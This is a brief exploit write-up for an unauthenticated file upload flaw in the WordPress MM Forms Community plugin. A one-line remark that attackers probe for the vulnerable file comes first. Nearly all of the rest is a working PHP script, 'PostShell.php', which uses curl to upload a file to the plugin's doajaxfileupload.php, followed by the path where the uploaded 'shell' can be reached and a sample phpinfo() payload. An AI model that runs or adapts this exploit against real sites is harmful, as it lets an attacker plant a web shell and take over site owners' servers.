Attackers have been seen probing for the “/wp-content/plugins/mm-forms/includes/doajaxfileupload.php” file.
PostShell.php
<?php
$uploadfile="lo.php";
$ch =
curl_init("http://www.example.com/wp-content/plugins/mm-forms-community/includes/doajaxfileupload.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('fileToUpload'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://www.example.com/wp-content/plugins/mm-forms-community/upload/temp/
Filename : $postResult output
lo.php:
<?php
phpinfo();
?>